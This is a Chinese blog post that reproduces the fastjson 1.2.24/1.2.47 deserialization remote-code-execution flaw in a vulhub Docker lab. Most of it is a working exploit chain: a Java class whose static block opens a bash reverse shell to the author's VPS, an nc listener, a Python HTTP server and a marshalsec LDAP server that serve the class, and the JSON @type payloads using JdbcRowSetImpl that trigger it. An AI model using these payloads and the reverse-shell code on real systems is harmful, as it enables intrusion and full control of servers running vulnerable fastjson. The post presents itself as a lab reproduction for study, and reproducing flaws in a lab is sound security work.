fastjson反序列化漏洞复现

2022-03-03  本文已影响0人  YPL8

fastjson反序列化漏洞复现

详细描述

fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。

复现环境

42.xx.xx.158   靶机ip
27.xx.xx.220   vps          java版本1.8.0_261
win10          burp抓包执行poc 

漏洞复现

1、靶机环境安装

//42.xx.xx.158下载vulhub环境
git clone https://github.com/vulhub/vulhub.git
image.png

2、靶机环境部署过程

//进入fastjson漏洞环境目录
ls
cd vulhub/
cd fastjson/
cd 1.2.47-rce/
image.png

3、靶机生成docker环境

//进入fastjson漏洞环境目录下执行,默认端口为8090
docker-compose up -d
docker ps
image.png

4、靶机环境搭建成功

//访问靶机
http://42.xx.xx.158:8090/
image.png

5、vps下载marshalsec

地址:https://github.com/mbechler/marshalsec
//进入marshalsec-master目录
cd /tmp/marshalsec-master/
//使用maven编译jar包
mvn clean package -DskipTests
image.png

6、vps marshalsec编译成功


image.png

7、成功生成marshalsec-0.0.3-SNAPSHOT-all.jar


image.png

8、vps监听端口

 nc -lvvp 6666
image.png

9、EXP源代码,保存为test.java

// bash -i >& /dev/tcp/27.xx.xx.220/6666 0>&1    这里的ip是vps,以及vps监听的端口6666
import java.lang.Runtime;
import java.lang.Process;

public class test {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/27.xx.xx.220/6666 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

10、javac编译生成test.class文件

javac test.java
image.png

11、把test.class复制到/root目录下


image.png

12、使用python搭建一个临时的web服务

python2 -m SimpleHTTPServer 8445
image.png

13、访问http://27.xx.xx.220:8445/

image.png

14、vps启动LDAP服务,监听1389端口,并制定加载远程类

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://27.xx.xx.220:8445/#test" 1389
image.png

15、fastjson反序列化漏洞poc

// ldap://27.xx.xx.220:1389/test   vpsip,LDAP监听端口1389,test恶意test.class
// 1.2.24版本poc
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://27.xx.xx.220:1389/test",
        "autoCommit":true
    }
}

// 1.2.47版本poc
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://27.xx.xx.220:1389/test",
        "autoCommit":true
    }
}

16、burp抓包执行poc


image.png

17、反弹成功,获取靶机docker


image.png

仅供学习使用!!

上一篇下一篇

猜你喜欢

热点阅读